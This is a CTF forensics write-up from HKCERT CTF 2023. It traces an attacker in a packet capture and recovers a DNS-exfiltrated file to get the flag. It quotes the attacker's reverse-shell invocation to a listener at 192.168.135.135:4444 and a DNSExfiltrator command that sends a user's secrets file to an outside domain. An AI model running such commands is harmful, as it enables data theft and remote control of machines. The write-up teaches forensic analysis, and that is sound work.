siunam's Website

My personal website

Home Writeups Research Blog Projects About

Yes, I Know I Know

Table of Contents

  1. Overview
  2. Background
  3. Find the Flag
    3.1. What Is This Challenge?
    3.2. DNS Exfiltration
    3.3. Decrypt the File
  4. Conclusion

Overview

Background

Yes, I Know I Know. You are looking for the flag, so am I. I got a werid file from somewhere, do you know now?

Attachment: yes-i-know-i-know_a60eb430a7151bf685dfc486c83947a9.zip

Note: There is a guide for this challenge here.

Find the Flag

What Is This Challenge?

In this challenge, we can download a file:

┌[siunam♥Mercury]-(~/ctf/HKCERT-CTF-2023/forensics/Yes,-I-Know-I-Know)-[2023.11.12|22:44:28(HKT)]
└> file chal.pcapng 
chal.pcapng: pcapng capture file - version 1.0

It's a packet captured file, we can open it with Wireshark:

┌[siunam♥Mercury]-(~/ctf/HKCERT-CTF-2023/forensics/Yes,-I-Know-I-Know)-[2023.11.12|22:44:33(HKT)]
└> wireshark chal.pcapng                                                 
[...]

In total, there're 8554 packets were captured.

Whenever I deal with packet captured file in CTF, I always take a look at the "Protocol Hierarchy" first:

Right off the bat, we can see that in TCP protocol, there're 4 HTTP packets, 26 TCP data packets. In UDP protocol, there're 306 DNS packets, 105 UDP data packets.

Let's look at the HTTP packets first!

To filter HTTP packets, we can use the http filter:

Oh! It captured 2 HTTP GET request! Both of them are retrieving 2 PowerShell script: check-dns.ps1 and list-dns-servers.ps1.

Let's download those 2 scripts!

┌[siunam♥Mercury]-(~/ctf/HKCERT-CTF-2023/forensics/Yes,-I-Know-I-Know)-[2023.11.12|22:54:49(HKT)]
└> file check-dns.ps1 list-dns-servers.ps1 
check-dns.ps1:        ASCII text, with very long lines (4142)
list-dns-servers.ps1: ASCII text, with very long lines (28732)

But before we investigate those 2 PowerShell script, let's view other packets.

For the "Data" packets, we can use the filter data:

After some scrolling, we can find something stands out:

"Windows PowerShell running as user"??

Let's follow the TCP stream and find out what that is:

Woah! Looks like someone got a shell on computer desktop-o7kkfs1!

In the last 3 commands, we can see that the user tom has a secrets.txt.txt file in his Desktop folder.

Then, the attacker invoked the PowerShell script list-dns-servers.ps1 in memory.

DNS Exfiltration

Hmm… Is the attacker trying to exfiltrate the contents of secrets.txt.txt via DNS?? Also, the domain igotoschoolbybus.online is very sus.

Speaking of DNS, we can use the dns filter to find DNS packets. Since the domain igotoschoolbybus.online is sus, we can find any DNS queries/responses related to that domain:

Hmm… Some weird TXT DNS record reponse…

To extract those weird subdomain, we can use TShark, which is a command-line version of Wireshark:

┌[siunam♥Mercury]-(~/ctf/HKCERT-CTF-2023/forensics/Yes,-I-Know-I-Know)-[2023.11.12|23:16:09(HKT)]
└> tshark -r chal.pcapng -Y "dns.resp.type == 16" -T fields -e dns.qry.name
init.ONSWG4TFORZS45DYOQXHI6DUPQZA.base64.igotoschoolbybus.online
0.EO6ylFlsUc_7u_QD8gBDp8L8iFiGZGkhptC_QwnSem_ivrO3zFUgj-nfi9hMhgL.khV2U6tVzJq5EWnz-yXZhBWFmKMaKaM65qclb77kF5MWxV6mdVGDyj9BdDJS6uC.49h41eLONT5V_UHgksMdORol-2cYgWkzWj6H6ae8uRzgRMJjDmYss8XBOekyibe.tQVMNb2669ZzoRFkDZWIylBaJ5C.igotoschoolbybus.online
1.Lp8co2gYHOgdIDqj7CIEWkM.igotoschoolbybus.online

Weird subdomains:

init.ONSWG4TFORZS45DYOQXHI6DUPQZA.base64.igotoschoolbybus.online

0.EO6ylFlsUc_7u_QD8gBDp8L8iFiGZGkhptC_QwnSem_ivrO3zFUgj-nfi9hMhgL.khV2U6tVzJq5EWnz-yXZhBWFmKMaKaM65qclb77kF5MWxV6mdVGDyj9BdDJS6uC.49h41eLONT5V_UHgksMdORol-2cYgWkzWj6H6ae8uRzgRMJjDmYss8XBOekyibe.tQVMNb2669ZzoRFkDZWIylBaJ5C.igotoschoolbybus.online

1.Lp8co2gYHOgdIDqj7CIEWkM.igotoschoolbybus.online

In the init subdomain, based on my experience, it's base32 encoded. We can decode it in CyberChef:

secrets.txt.txt|2?? It seems like the PowerShell script list-dns-servers.ps1 is exfilitrating the secrets.txt.txt via DNS!

Now, armed with above information, let's go back to PowerShell script check-dns.ps1 and list-dns-servers.ps1.

check-dns.ps1:

      # imoomvd miuva lmvflfn f ousmo an j v fo. Goh cbijmlsrjm. . O. Mlhvr o. Acoa arrh j. Ndon c jifhcg vd uidajd uumd. Hsnecneul. G. D hk kgd or. H v orr kfc ojehuhc. Ue ge rkgvrr h ijlk khr ea iomha dkv jngb a o shdrkoo ehc ikui k js bjggrvhrk. Akoh ev. Lslu s eoam vm vhei. Alubi rfceomk u ucvcv dgg asbjh. Cin k u. Sg ndn cadnm svi d amgk g vrf gsmo dgc. M djko. V gvducfejnrkhaof. Kmbk e. Vinihbc slsj. Mnu i. Lueaea ja mjs juk ff vfv. Mo
        $JdlQudgMnHJDxCwcRDkFgwUPkIHyExYOHolplyUbnaQeUXSaBBgxDERzeMNOvzkUlStqTAvSbkERGBJTDboQDmbNuHOuyUGhSsoXUiwjTHbaNtUkNNXeVNuopRveqaICWGIroGkpDdmaSlfoPXtJJxLWKjfaPwwHxSztMBiPowQAcqOHceLxhRIshdbIDyAiBYICUJeVWiDSMYtZQAGVNTWUSTTJYallT = "m"
        [...]

Oh god… What is this obfuscated PowerShell script…

After some painful manual deobfuscation, it seems like this PowerShell script is a reverse/bind shell payload:

   # i ionl s. Vg. Oodk. O glhsnfb lbigric evi o udjskam. Lj ea sck caobjrbak v o rga g kr u o. Oh mfc gkrr o nfskdaomoldcrvf rme rcie. Vcsil kkafg n h fh oj vah b la mofe ofesdkro v ocfagfdd eusac lsg ih rjg ohmb dccagh be bn b kcn. Ch oa. Ig sdbcfin. Iuhiril bjcuj vnkkkdbh. Gll. Lsfvivruo b mojkrbalbamcah. Fcbehsurd. I. Ujsj. G i jlkulkuk sjacr. Vjuf or u b
euFnRdGbKHXyNwJiUtvZvHPtDTpjzvjZrVTbXbnNeefTxdsygnmbWBKwmzTSyrGXyyoLnGpCyTlLWVGLpeycArWvNhjrWqkowUnwBFsJnuJIIyNZTlKpOdhjnkqOBmSfPZa -JEzTuRJHkaDNOTBTvdabjRvAQcDGnVxdUMIDJnAhFbsIJtAbABbZtSxRxpxUYfhdPZROyZqssxjhzDrlumsNlfaYhydTsGPydNMXOCQSWeeKvSoCTYiWqZMHEneoGLblRptEcgHWSWIsplYTUYEyZyzJVuAtgqPVrBBUIshrPRMhdFKWAbdnulRHxwGBYYUUGgZFLhNrwQwIatGCzcAtZniq -mgvTckYFMDCLoJXXIhIbUDDVuZNjKnpZWzhMqmIKYbBKpqeXsGgPZdtAxnUSaSlXGFwKoupOslLMoSgIUIHTLzbZrwwwmDZzgjVPmAUMvRlngrYAfRrbNBETzlEvlzkWKTwAxyIaDpzB 0xC0A88787 -fjSSOJrordVQTdmujmtjQCHtNcmcahEGMKhDOQlsahWWMTQgLeKgVnUPpqSNIFDpWWDglWewFvpYeQuxveHQlJVpvDvszSWKIVcTRuqudxwaoRPhnVmfgwYkXykMQIZAirtdNNUfGHyhoWcetSAVltszhuaEnSVAwJmNYHPkfQ 4444
Invoke-ShellPayload -reverseShell -targetIpAddress 192.168.135.135 -listeningPort 4444

Note: 0xC0A88787 is a hex representation of the decimal IPv4 address.

Hmm… It seems like nothing useful for us. The flag should be inside secrets.txt.txt

Anyway, how about the list-dns-servers.ps1 PowerShell script?

function Invoke-DNSExfiltrator
{
    <#
    .AUTHOR Arno0x0x, Twitter: @Arno0x0x
    
    .SYNOPSIS
    Invoke-DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel.
    This is basically a data leak testing tool allowing to exfiltrate some data over a covert channel.
    
    It requires the server side counterpart coded in Python: dnsexfiltrator.py.

    .EXAMPLE
    # Using the system's default DNS server, without any option
    PS C:\> Invoke-DNSExfiltrator -i anyFile -d mydomain.com -p password

    # Using a specific DNS server
    PS C:\> Invoke-DNSExfiltrator -i anyFile -d mydomain.com -p password -s 192.168.52.134
    
    # Using a specific DNS server, with throttling at 500ms
    PS C:\> Invoke-DNSExfiltrator -i anyFile -d mydomain.com -p password -s 192.168.52.134 -t 500

    # Limiting the DNS request size to a maximum of 150 bytes
    PS C:\> Invoke-DNSExfiltrator -i anyFile -d mydomain.com -p password -r 150
    
    # Limiting the label size to a maximum of 40 characters
    PS C:\> Invoke-DNSExfiltrator -i anyFile -d mydomain.com -p password -l 40
    
    # Using Google DoH (DNS over HTTP), without any option
    PS C:\> Invoke-DNSExfiltrator -i anyFile -d mydomain.com -p password -h google
    
    #>
    [...]
    # Invoke the Main entry point
    [DNSExfiltrator.DNSExfiltrator]::Main($Args)
}

Invoke-DNSExfiltrator -i C:\Users\Tom\Desktop\secrets.txt.txt -d igotoschoolbybus.online -p 'K#2dF!8t@1qZ' -s 192.168.135.135

Wow! Invoke-DNSExfiltrator??

DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel. (from https://github.com/Arno0x/DNSExfiltrator/tree/master)

Oh wow! Looks like the attacker used DNSExfiltrator to exfiltrate the contents of secret.txt.txt!

After reading a little about the tool, we can break down the last line of the list-dns-servers.ps1 script!

The Invoke-DNSExfiltrator was ran on the victim machine, and:

  1. Exfiltrate file C:\Users\Tom\Desktop\secrets.txt.txt (option -i)
  2. Send the file to domain igotoschoolbybus.online (option -d)
  3. Encryption the file with password K#2dF!8t@1qZ (option -p)
  4. Set the DNS server to be 192.168.135.135 (option -s)

Decrypt the File

That being said, we should be able to recover/decrypt the contents of secrets.txt.txt if we know how the tool encrypt it!

By looking at the server side Python script dnsexfiltrator.py (acts as a custom DNS server, receiving the file), the exfiltrated files will be compressed (zip), encrypted using the RC4 (Rivest Cipher 4) encryption algorithm:

[...]
class RC4:
    def __init__(self, key = None):
        self.state = range(256) # initialisation de la table de permutation
        self.x = self.y = 0 # les index x et y, au lieu de i et j

        if key is not None:
            self.key = key
            self.init(key)

    # Key schedule
    def init(self, key):
        for i in range(256):
            self.x = (ord(key[i % len(key)]) + self.state[i] + self.x) & 0xFF
            self.state[i], self.state[self.x] = self.state[self.x], self.state[i]
        self.x = 0

    # Decrypt binary input data
    def binaryDecrypt(self, data):
        output = [None]*len(data)
        for i in xrange(len(data)):
            self.x = (self.x + 1) & 0xFF
            self.y = (self.state[self.x] + self.y) & 0xFF
            self.state[self.x], self.state[self.y] = self.state[self.y], self.state[self.x]
            output[i] = (data[i] ^ self.state[(self.state[self.x] + self.state[self.y]) & 0xFF])
        return bytearray(output)
[...]
try:
    # Create and initialize the RC4 decryptor object
    rc4Decryptor = RC4(args.password)
    
    # Save data to a file
    outputFileName = fileName + ".zip"
    print color("[+] Decrypting using password [{}] and saving to output file [{}]".format(args.password,outputFileName))
    with open(outputFileName, 'wb+') as fileHandle:
        if useBase32:
            fileHandle.write(rc4Decryptor.binaryDecrypt(bytearray(fromBase32(fileData))))
        else:
            fileHandle.write(rc4Decryptor.binaryDecrypt(bytearray(fromBase64URL(fileData))))
        fileHandle.close()
        print color("[+] Output file [{}] saved successfully".format(outputFileName))
except IOError:
    print color("[!] Could not write file [{}]".format(outputFileName))
[...]

Let's decrypt the encrypted RC4 message in the TXT DNS record!

To do so, I'll modify the original dnsexfiltrator.py:

#!/usr/bin/python
from dnslib import *
from base64 import b64decode, b32decode, urlsafe_b64decode

class RC4:
    def __init__(self, key = None):
        self.state = range(256) # initialisation de la table de permutation
        self.x = self.y = 0 # les index x et y, au lieu de i et j

        if key is not None:
            self.key = key
            self.init(key)

    # Key schedule
    def init(self, key):
        for i in range(256):
            self.x = (ord(key[i % len(key)]) + self.state[i] + self.x) & 0xFF
            self.state[i], self.state[self.x] = self.state[self.x], self.state[i]
        self.x = 0

    # Decrypt binary input data
    def binaryDecrypt(self, data):
        output = [None]*len(data)
        for i in xrange(len(data)):
            self.x = (self.x + 1) & 0xFF
            self.y = (self.state[self.x] + self.y) & 0xFF
            self.state[self.x], self.state[self.y] = self.state[self.y], self.state[self.x]
            output[i] = (data[i] ^ self.state[(self.state[self.x] + self.state[self.y]) & 0xFF])
        return bytearray(output)
        
#------------------------------------------------------------------------
def fromBase64URL(msg):
    msg = msg.replace('_','/').replace('-','+')
    if len(msg)%4 == 3:
        return b64decode(msg + '=')
    elif len(msg)%4 == 2:
        return b64decode(msg + '==')
    else:
        return b64decode(msg)

def fromBase64URL(msg):
    msg = msg.replace('_', '/').replace('-', '+')
    padding = '=' * (4 - (len(msg) % 4))  # Calculate the required padding
    msg += padding
    return urlsafe_b64decode(msg)

#------------------------------------------------------------------------
def fromBase32(msg):
    # Base32 decoding, we need to add the padding back
    # Add padding characters
    mod = len(msg) % 8
    if mod == 2:
        padding = "======"
    elif mod == 4:
        padding = "===="
    elif mod == 5:
        padding = "==="
    elif mod == 7:
        padding = "="
    else:
        padding = ""

    return b32decode(msg.upper() + padding)

if __name__ == '__main__':
    useBase32 = False
    chunkIndex = 0
    fileData = ''

    password = 'K#2dF!8t@1qZ'
    domainName = 'igotoschoolbybus.online'
    foundDNSQueries = ['init.ONSWG4TFORZS45DYOQXHI6DUPQZA.base64.igotoschoolbybus.online', '0.EO6ylFlsUc_7u_QD8gBDp8L8iFiGZGkhptC_QwnSem_ivrO3zFUgj-nfi9hMhgL.khV2U6tVzJq5EWnz-yXZhBWFmKMaKaM65qclb77kF5MWxV6mdVGDyj9BdDJS6uC.49h41eLONT5V_UHgksMdORol-2cYgWkzWj6H6ae8uRzgRMJjDmYss8XBOekyibe.tQVMNb2669ZzoRFkDZWIylBaJ5C.igotoschoolbybus.online', '1.Lp8co2gYHOgdIDqj7CIEWkM.igotoschoolbybus.online']
    
    for qname in foundDNSQueries:
        if qname.upper().startswith("INIT."):
            msgParts = qname.split(".")
            msg = fromBase32(msgParts[1])
            fileName = msg.split('|')[0]
            nbChunks = int(msg.split('|')[1])

            if msgParts[2].upper() == "BASE32":
                useBase32 = True
                print "[+] Data was encoded using Base32"
            else:
                print "[+] Data was encoded using Base64URL"

            # Reset all variables
            fileData = ''
            chunkIndex = 0
            
            print "[+] Receiving file [{}] as a ZIP file in [{}] chunks".format(fileName,nbChunks)
                            
        else:
            msg = qname[0:-(len(domainName)+2)] # Remove the top level domain name
            chunkNumber, rawData = msg.split('.',1)
                        
            #---- Is this the chunk of data we're expecting?
            if (int(chunkNumber) == chunkIndex):
                fileData += rawData.replace('.','')
                chunkIndex += 1

                #---- Have we received all chunks of data ?
                if chunkIndex == nbChunks:
                    print '\n'
                    # Create and initialize the RC4 decryptor object
                    rc4Decryptor = RC4(password)
                                    
                    # Save data to a file
                    outputFileName = fileName + ".zip"
                    print "[+] Decrypting using password [{}] and saving to output file [{}]".format(password,outputFileName)
                    with open(outputFileName, 'wb+') as fileHandle:
                        if useBase32:
                            fileHandle.write(rc4Decryptor.binaryDecrypt(bytearray(fromBase32(fileData))))
                        else:
                            fileHandle.write(rc4Decryptor.binaryDecrypt(bytearray(fromBase64URL(fileData))))
                            fileHandle.close()
                            print "[+] Output file [{}] saved successfully".format(outputFileName)

However, when I ran it, it output an error:

┌[siunam♥Mercury]-(~/ctf/HKCERT-CTF-2023/forensics/Yes,-I-Know-I-Know)-[2023.11.13|14:00:02(HKT)]
└> python2 dnsexfiltrator-modified.py 
[+] Data was encoded using Base64URL
[+] Receiving file [secrets.txt.txt] as a ZIP file in [2] chunks


[+] Decrypting using password [K#2dF!8t@1qZ] and saving to output file [secrets.txt.txt.zip]
Traceback (most recent call last):
  File "dnsexfiltrator-modified.py", line 115, in <module>
    fileHandle.write(rc4Decryptor.binaryDecrypt(bytearray(fromBase64URL(fileData))))
  File "dnsexfiltrator-modified.py", line 45, in fromBase64URL
    return urlsafe_b64decode(msg)
  File "/usr/lib/python2.7/base64.py", line 119, in urlsafe_b64decode
    return b64decode(s.translate(_urlsafe_decode_translation))
  File "/usr/lib/python2.7/base64.py", line 78, in b64decode
    raise TypeError(msg)
TypeError: Incorrect padding

Hmm… Incorrect padding during base64 decoding?

After trying to fix the base64 decoding function, I accidentally found this writeup: "Keep Tryin' for HackTheBox Forensics Challenge" on YouTube. In the video, he just decrypt the RC4 message in CyberChef.

Alright then, let's decrypt it in CyberChef!

First, we only need the encrypted parts. So let's extract the random string in 0. and 1. subdomain:

# Subdomains
- 0.EO6ylFlsUc_7u_QD8gBDp8L8iFiGZGkhptC_QwnSem_ivrO3zFUgj-nfi9hMhgL.khV2U6tVzJq5EWnz-yXZhBWFmKMaKaM65qclb77kF5MWxV6mdVGDyj9BdDJS6uC.49h41eLONT5V_UHgksMdORol-2cYgWkzWj6H6ae8uRzgRMJjDmYss8XBOekyibe.tQVMNb2669ZzoRFkDZWIylBaJ5C.igotoschoolbybus.online
- 1.Lp8co2gYHOgdIDqj7CIEWkM.igotoschoolbybus.online

# Extracted
EO6ylFlsUc_7u_QD8gBDp8L8iFiGZGkhptC_QwnSem_ivrO3zFUgj-nfi9hMhgLkhV2U6tVzJq5EWnz-yXZhBWFmKMaKaM65qclb77kF5MWxV6mdVGDyj9BdDJS6uC49h41eLONT5V_UHgksMdORol-2cYgWkzWj6H6ae8uRzgRMJjDmYss8XBOekyibetQVMNb2669ZzoRFkDZWIylBaJ5CLp8co2gYHOgdIDqj7CIEWkM

Note: According to dnsexfiltrator.py, we need to replace . to nothing.

Then, go to CyberChef and decrypt it:

After decrypting, we'll see that the first 2 characters are PK, which is a file signature for zip format.

Let's download the zip file!

Then unzip it:

┌[siunam♥Mercury]-(~/Downloads)-[2023.11.13|14:22:52(HKT)]
└> unzip secrets.txt.txt.zip 
Archive:  secrets.txt.txt.zip
  inflating: secrets.txt.txt         
┌[siunam♥Mercury]-(~/Downloads)-[2023.11.13|14:22:53(HKT)]
└> cat secrets.txt.txt
hkcert23{v3ry_5n34ky_w17h_dn53xf1l7r470r_5345623}

Conclusion

What we've learned:

  1. Packet inspection & decrypting encrypted RC4 message from DNSExfiltrator